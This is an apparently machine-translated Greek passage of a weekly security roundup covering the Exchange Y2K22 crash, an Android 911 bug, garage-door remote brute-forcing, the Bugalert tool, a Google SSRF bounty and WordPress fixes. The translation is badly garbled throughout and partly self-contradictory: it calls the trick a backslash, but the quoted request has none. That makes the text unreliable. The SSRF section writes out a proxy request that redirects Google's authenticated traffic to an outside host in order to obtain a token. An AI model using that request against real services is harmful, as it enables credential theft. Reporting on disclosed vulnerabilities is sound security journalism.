Αυτή την εβδομάδα στην ασφάλεια: Y2K22, ακούσια μπλοκάρισμα 911, καθώς και ειδοποίηση Bug

εάν είχατε την ατυχία να τρέξει ένα Microsoft Exchange Server αυτή την περασμένη εβδομάδα, τότε δεν σας απαίτησε να σας πω για το πρόβλημα y2k22 . Για να πιάσετε τις υπόλοιπες μας, όταν το Exchange προσπάθησε να κατεβάσει τον πολύ πρώτου ενημερωμένους ορισμού κακόβουλου μηνύματος του Malware του 2022, ο αριθμός έκδοσης των νέων ορισμών πυροδότησε ένα ατύχημα στον κινητήρα ανίχνευσης κακόβουλων λογισμών. Η ημερομηνία αντιπροσωπεύεται ως συμβολοσειρά 2201010001, όπου τα δύο πρώτα δύο ψηφία αντιπροσωπεύουν το έτος. Αυτή η συμβολοσειράς μετατρέπεται σε ένα υπογεγραμμένο μακρύ ακέραιο, το οποίο εξαντλείται στα 2.147.483.647. Ο ακέραιος υπερχείλιση, καθώς και το αποτέλεσμα είναι η απροσδιόριστη συμπεριφορά, συντρίβοντας τον κινητήρα. Ο διακομιστής σταματά να λειτουργεί ασφαλής, να μην επεξεργάζεται οποιοδήποτε είδος μηνυμάτων χωρίς κινητήρα κακόβουλου λογισμικού εργασίας, το οποίο σημαίνει ότι δεν υπάρχει ηλεκτρονικό ταχυδρομείο. Ευχαριστημένος Νέο Έτος!

Android 911 άρνηση υπηρεσίας

Η κλήση 911 για τις υπηρεσίες έκτακτης ανάγκης είναι πολύ ο χειρότερος χρόνος για ένα σφάλμα εφαρμογής λογισμικού για να εκδηλωθεί. Η Google μόλις καθορίστηκε ένα τέτοιο σφάλμα στην ενημέρωση του Android του Ιανουαρίου. Είναι μία από αυτές τις παράξενες ακουστικές αλληλεπιδράσεις app – σε αυτή την κατάσταση οι ομάδες της Microsoft προκαλούν το σφάλμα Android. Εάν η εφαρμογή Teams είναι εγκατεστημένη, ωστόσο δεν καταγράφεται λογαριασμός, οι ομάδες παράγει καθώς και τα καταχωρητά ένα νέο στοιχείο Phoneacount σε κάθε έναρξη. Αυτό φαίνεται σαν να είναι σπάνιο, ωστόσο οι ομάδες στο Android είναι επίσης διαβόητοι για να συνδεθούν το άτομο αυθόρμητα. Όταν καλέσετε το 911, το Android τρέχει μια ρουτίνα για να προσδιορίσει ποια φωνή πρέπει να χρησιμοποιηθεί για να διαδρομή την κλήση, καθώς και λύνει τους δεσμούς συγκρίνοντας τις δόσεις. Αυτή η σύγκριση είναι απλώς μια αφαίρεση αφαίρεσης, που υποδηλώνει ότι υπάρχει πιθανότητα 50% για να πάρει ένα δυσμενές αποτέλεσμα. Αυτό ήταν απρόβλεπτο, οδηγώντας στη συντριβή.

Πόρτα γκαράζ αντίστροφη μηχανική

Αντίστροφη μηχανική Ένα σχέδιο ασύρματης εξουσιοδότησης 30 ετών μπορεί να μην είναι το πιο επιτόκιο που αρπάζει το Feat, ωστόσο σε ορισμένες περιπτώσεις το ταξίδι είναι η δική του ανταμοιβή. [Ο Maxwell Dulin] μας φέρνει την ιστορία, καθώς και αυτό το ταξίδι αξίζει σίγουρα. Τα βασικά στοιχεία αυτού του hack είναι σίγουρα βιώσιμα, ξεκινώντας από τη λήψη ενός υλικού. Η πόρτα του γκαράζ συγχρονίζεται με το ανοιχτήρι της πόρτας του γκαράζ κρατώντας ένα pushbutton στον δέκτη κατά την αποστολή ενός κώδικα. Μέσα στο ανοιχτήρι, υπάρχουν εννέα διακόπτες εμβάπτισης, το καθένα με τρεις θέσεις. Τι κάνουν? Έβγαλε το αξιόπιστο SDR του για να πάρει την κυκλοφορία ιστού καθώς και να προσπαθήσει να αποκωδικοποιήσει τα σήματα. Το Inspectrum καθώς και το ραδιόφωνο GNU ήταν οι ήρωες εδώ, παρέχοντας μια εικόνα αυτού του εύκολου καθεστώτος ΑΠΘ. Η τελική σκέψη σε αυτή την πραγματική πόρτα γκαράζ; Μπορείτε να ωθήσετε έναν άγνωστο κώδικα στέλνοντας κάθε πιθανό combo, καθώς και μόνο 104 λεπτά.

Σκευωρός

Εάν είστε sysadmin, καταλαβαίνετε ότι ορισμένα θέματα τηλεφώνου για άμεση δράση. Εάν έτρεξαν διακομιστές Java, η ευπάθεια Log4J ήταν μια δοκιμή τερματισμού του πρωτοκόλλου αντίδρασης. Ο χρόνος μεταξύ της δημόσιας αποκάλυψης καθώς και κάθε φορά που ακούσατε γι ‘αυτό, μπορεί να ήταν αρκετό για να ξεκινήσει η καταστροφή. Ενώ υπάρχουν πολλές υπηρεσίες αναφοράς σφαλμάτων καθώς και τα πλαίσια, τίποτα δεν ταιριάζει σε αυτή την εξειδικευμένη χρήση της θήκης: ειδοποίηση σας το συντομότερο δυνατόν ότι τα μαλλιά σας μπορεί πραγματικά να είναι φωτιά. Ότι απλή εξειδικευμένη θέση Bugged [Matthew Sullivan], ο οποίος έχει αποκαλύψει ένα νέο έργο, συναγερμό σφαλμάτων. Είναι όλα ανοιχτή πηγή, ώστε να μπορείτε να κρατήσετε τη δική σας περίπτωση αν θέλετε πραγματικά. Μπορείτε να επιλέξετε να πάρετε ένα tweet, κείμενο ή ακόμα και τηλεφωνική κλήση. Αυτό έχει το υποψήφιο να είναι ένα χρήσιμο εργαλείο, ρίξτε μια ματιά!

Νιώθω σαν να απαιτώ να κάνω συναγερμό σφαλμάτων που ξεκίνησε ένα συγκεκριμένο περίεργο τραγούδι al …

Το ζόμπι SSRF

[David Schütz] ψάχνει για ασαφή Apis Google, καθώς και βρήκε jobs.googleapis.com, την οποία μπορείτε να υποδείξετε τον εαυτό σας. Αυτό το demo είναι ενδιαφέρον, δεδομένου ότι δεν είναι μια εντελώς σαρκισμένη υπηρεσία, ωστόσο μιλάει με το γνήσιο back-end. Τα αιτήματα πηγαίνουν με έναν πληρεξούσιο, cxl-services.appspspot.com, το οποίο χειρίζεται το βήμα ελέγχου ταυτότητας για τη σελίδα επίδειξης. Εάν μπορεί να ξεπεράσει μια πλαστογραφία αίτησης από πλευράς διακομιστή (SSRF), μπορεί να είναι σε θέση να πάρει τα πιστοποιημένα αιτήματα, καθώς και ίσως τεχνική το πληρεξούσιο για την αποστολή της κυκλοφορίας ιστού για λογαριασμό του. Η αναλυτική διεύθυνση URL είναι δύσκολη. Η τεχνική που εργάστηκε; Ένα backslash στη διεύθυνση URL. get /proxy?url=https://sfmnev.vps.xdavidhu.me@jobs.googleapis.com/ http / 1.1

Με την πρόσβαση κέρδους στο Token στο χέρι, [David] ξεκίνησε διεξοδικά για να ελέγξει προσεκτικά άλλα API Google για να δει τι αυτό το διακριτικό τον παρείχε να αποκτήσει πρόσβαση σε. Παρέχει την προειδοποίηση που καλύπτουμε πριν, να είστε προσεκτικοί ακριβώς πόσο μακριά πιέζετε. Μπορεί να έχει αναφέρει το σφάλμα καλύτερα μακριά, ωστόσο ήθελε να επαληθεύσει ότι είχε πραγματικά μια πρόσβαση σε απευθείας σύνδεση κέρδος στο διακριτικό. Αφού επιβεβαιώσει το διακριτικό βοήθησε να ελέγξει την πρόσβαση, γύρισε στο εύρημα, καθώς και ξεδιπλώθηκε ένα εξαιρετικά καλό $ 3133,70, εκτός από ένα επιπλέον $ 1000 για μια μεγάλη έκθεση καθώς και την προσεκτική ματιά στο πλευρικό κίνημα. Αυτό είναι όλο που υπάρχει, σωστά; Οχι. Λίγο πριν από τη λήξη της προθεσμίας αποκάλυψης 90 ημερών, το [David] βρήκε μια παράκαμψη επισκευής. adding Οποιοσδήποτε τύπος κειμένου μεταξύ της πλάκας καθώς και @ ήταν αρκετός για να το σπάσει. ένα ακόμη $ 3133,70. Απλά για διασκέδαση, ανίχνευσαν τις παλιές διευθύνσεις URL, που δεν θα έπρεπε να είναι σε λειτουργία μετά την επιδιόρθωση. Ναι, ανακάλυψε ακόμα ένα ακόμη και ένα διακριτικό ασφάλειας και ασφάλειας, καθώς και τα 3133,70 δολάρια. Αυτό το ζόμπι SSRF εξακολουθεί να μην είναι νεκρό, όπως αποδεικνύεται στο Twitter:

WordPress update

Εάν δεν έχετε ρυθμίσει την εμφάνιση του WordPress να ενημερώνεται αυτόματα, ήρθε η ώρα να επιθεωρήσετε την πιο πρόσφατη έκδοση. Υπάρχουν τέσσερα δυνητικά επιβλαβή προβλήματα εδώ, αν και οι λεπτομέρειες είναι σπάνιες σε αυτό το σημείο. Πολύ πρώτα είναι μια ευπάθεια δέσμης ενεργειών για τη δημοσίευση γυμνοσάλιαγκων, το μέρος της διεύθυνσης URL που ταιριάζει με το όνομα δημοσίευσης. Το δεύτερο πρόβλημα που συζητήθηκε είναι η ένεση των στοιχείων σε μερικές πολυκαταστάσεις διαμορφώσεις. Οι δύο τελευταίες υποδοχές είναι οι ενέσεις SQL, σίγουρα αξίζουν το “τι χρόνο είναι;” meme.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Post

Δίνοντας μια έκκεντρη εγκαθιστώντας ένα κομμάτι (μαγνητική) ελκυστικότηταΔίνοντας μια έκκεντρη εγκαθιστώντας ένα κομμάτι (μαγνητική) ελκυστικότητα

Είναι πιθανότατα χωρίς να δηλώσει ότι οι πολλοί χάκερ καθώς και οι κατασκευαστές δεν θέλουν πραγματικά να αναστατώσουν με τις λεπτομέρειες να κάνουν την τεκμηρίωση του έργου τους . Θα

Φτερά, τροχοί, καθώς και περιπατητές που μετακινούν την ανθρωπότητα μπροστάΦτερά, τροχοί, καθώς και περιπατητές που μετακινούν την ανθρωπότητα μπροστά

αυξάνονται στη δυσκολία των φτερωτών κτιρίων, των τροχών, καθώς και οι περιπατητές. Σήμερα ξεκινάμε το περιήγηση για τα πράγματα που κινούνται καθώς και κάνουν τον κόσμο λίγο λίγο καλύτερο πολύ